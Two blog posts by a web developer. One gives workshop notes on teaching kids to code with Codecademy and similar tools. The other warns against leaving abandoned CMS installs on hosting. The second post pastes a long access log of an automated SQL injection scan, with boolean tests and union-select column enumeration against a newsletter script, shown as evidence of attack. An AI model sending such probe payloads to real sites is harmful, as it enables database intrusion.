Teaching Codecademy

This was meant to be a temporary post – so I could easily publish some notes during eTwinning PDW 2014 workshop… but as I didn’t prepare any slides I’ll keep it up so it can be linked into conference materials. AND it can serve as template to my next lecture, titled “Teaching young hackers” that I’ll present on a conference taking place in my old school – where I learned to be hacker some 30 years back.

Codecademy was the main topic this time – but as discussed on Saturday in some smaller circles we should not ask “how can we use Codecademy in classroom”, as simply learning to code – or coding – shouldn’t be considered as the target. What are the cool / useful / fun things one could do with code – to create need for learning to code? Like – Minecraft is written in Java, but if you want to create mods you can start with simpler Javascript ScriptCraft mods … and JavaScript can be learned on Codecademy. Hmm, could we create a course for using ScriptCraft? (btw – Minecraft can be used for designing models that can be 3D-printed, see Printcraft and minecraft.print())

Or, for less game-minded – could solving Project Euler math problems be reason to learn programming? Could you do music or paint? Or could you evade surveillance – like in Cory Doctorow’s Little Brother (must-read, mostly culture not code)?

Also – please bear in mind, that programming might NOT be for everybody – as Jeff (who can program) explains in Why Can’t Programmers.. Program?. Let’s make sure all “we’ll teach all kids to code” projects (a) give all kids chance to understand if concept of coding is suitable for their mindset (b) take a wider approach and promote the idea that not everybody developing software is coder: we need at least us much designers, architects, technical writers, testers (you can break things and earn money!) etc.

Actual courses we looked at during workshop:

Playground for your own projects – http://labs.codecademy.com/

Or use (and learn from) http://codepen.io/ or http://jsfiddle.net/

Or open Developer Tools in your browser – or use https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/http://tampermonkey.net/ plugins.

Or… look what Bret Victor thinks about tools we acutally need for teaching:

Postitatud rubriiki Määratlemata | Kommenteerimine suletud

leaving old CMS hanging around is really stupid idea

When it comes to data I’m definitely packrat – and that’s a bad habit when updating websites. Yes, keeping old newsletter engine around so archives are accessible keeps linkrot under control but creates at the same time unpatched dungeons that nobody remembers about… and nobody ever updates, of course.

While looking at a hacked WordPress site about a year ago I found on the same hosting possibly 5 copies of Drupal – some ancient sub-site for something, backup copy of that, previous version and then some more instances. A survey engine, possibly remains of document management system … etc. Having deobfuscated the code of malware first lines turned out to be starting from root and looking for everything worth infecting. Impossible to fix, only solution is to archive the code (just-in-case…) and delete it.

And seems I should take some time to go systematically through all my / client hostings as this is not the only site with this problem – and I have left abandoned code around myself. That came back to me while looking for yet another breach and spotting the following lines in logfile:


176.10.100.229 - - [06/Jun/2014:14:19:54 +0300] "GET /newsletter/index.php?id=41 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:55 +0300] "GET /newsletter/index.php?id=999999.9 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%20or%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%27%20or%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3E1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27y HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22y HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%27 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:02 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:03 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:04 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:06 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:07 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:07 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:08 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:08 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:09 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:09 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:10 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:10 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:11 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:11 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:12 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:12 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:13 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:13 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:15 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:15 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:16 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:16 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:17 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:17 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:19 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:19 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:20 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:20 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:21 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:21 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:22 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:22 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:24 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:24 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:26 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:26 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:27 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:27 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
